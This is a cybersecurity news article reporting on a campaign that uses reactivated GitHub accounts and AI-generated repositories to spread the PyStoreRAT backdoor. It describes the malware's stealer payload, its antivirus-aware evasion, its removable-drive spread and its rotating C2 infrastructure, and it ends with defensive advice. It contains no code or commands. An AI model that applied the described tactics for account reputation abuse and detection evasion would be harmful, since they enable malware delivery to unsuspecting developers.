A cunning new supply chain attack is specifically targeting Information Technology (IT) administrators and Open Source Intelligence (OSINT) professionals. This sophisticated campaign is leveraging the trusted platform of GitHub to distribute a stealthy backdoor known as PyStoreRAT. The attackers are employing a high level of planning, using dormant accounts to bypass suspicion and deliver malicious payloads directly to technical users seeking legitimate software solutions.
The operation begins with the reactivation of long-dormant GitHub accounts, a tactic likely chosen to capitalize on their existing reputation within the developer community. These reanimated accounts then begin publishing seemingly polished, AI-generated software projects. These repositories are frequently disguised as helpful tools, such as cryptocurrency bots, GPT wrappers, and other utilities related to cybersecurity. The use of AI-generated content enables threat actors to rapidly populate these repositories with credible-looking code, creating an illusion of ongoing activity and maintenance.
Morphisec analysts brought this campaign to light after noticing that several of these repositories had unexpectedly climbed into GitHub’s trending lists. This heightened visibility placed the malicious tools directly in the path of their intended targets. Once these repositories gained traction and a measure of trust within the community, the attackers introduced subtle “maintenance” commits. These updates contained a previously undocumented JavaScript and HTA backdoor, which the researchers have subsequently named PyStoreRAT.
PyStoreRAT: A Deeper Look into the Stealthy Backdoor
PyStoreRAT is engineered for long-term persistence and data exfiltration. Upon successful installation, it functions as a multi-purpose loader, capable of profiling the victim’s system and subsequently deploying additional malicious payloads. One of the primary payloads observed in conjunction with PyStoreRAT is the Rhadamanthys stealer, a tool specifically designed to exfiltrate sensitive information. Furthermore, the malware exhibits the capability to propagate itself through removable drives, significantly increasing its potential to spread undetected across an organization’s internal network.
A critical characteristic of PyStoreRAT is its adaptive evasion techniques. The malware meticulously checks for the presence of specific antivirus products, including notable security solutions like CrowdStrike Falcon and ReasonLabs. Should these defenses be detected, PyStoreRAT modifies its execution strategy, opting for alternative launch paths to circumvent detection and avoid triggering security alerts. This dynamic behavior makes traditional signature-based detection methods less effective.
The command-and-control (C2) infrastructure supporting this entire campaign is designed for resilience and adaptability. It employs a rotating set of nodes, which facilitates seamless updates to the malware’s payload and operational directives. This architectural design makes it considerably more challenging for cybersecurity defenders to dismantle the operation, as the infrastructure can swiftly pivot to new, unaffected nodes. Examination of the codebase has also revealed linguistic artifacts, such as Russian strings, which may indicate a specific geographic origin or a targeted operational scope.
In response to these evolving threats, cybersecurity experts emphasize the importance of employing behavioral-based defense strategies. Relying solely on static signatures for detection is increasingly insufficient against sophisticated malware like PyStoreRAT. Organizations are encouraged to monitor for unusual network activity, process execution anomalies, and suspicious file system changes that indicate potential compromise, even if traditional malware signatures are not present.
The ongoing nature of this sophisticated supply chain attack suggests that threat actors will continue to refine their methods for evading detection and exploiting trusted platforms like GitHub. The continued development and deployment of AI-generated code in malicious campaigns represent a growing concern for the cybersecurity landscape. Professionals in IT and OSINT fields should maintain heightened vigilance and implement robust security practices, including regular software updates, thorough code reviews, and comprehensive endpoint detection and response (EDR) solutions. As this threat evolves, monitoring for updates to PyStoreRAT’s capabilities and the associated C2 infrastructure will be crucial for effective defense.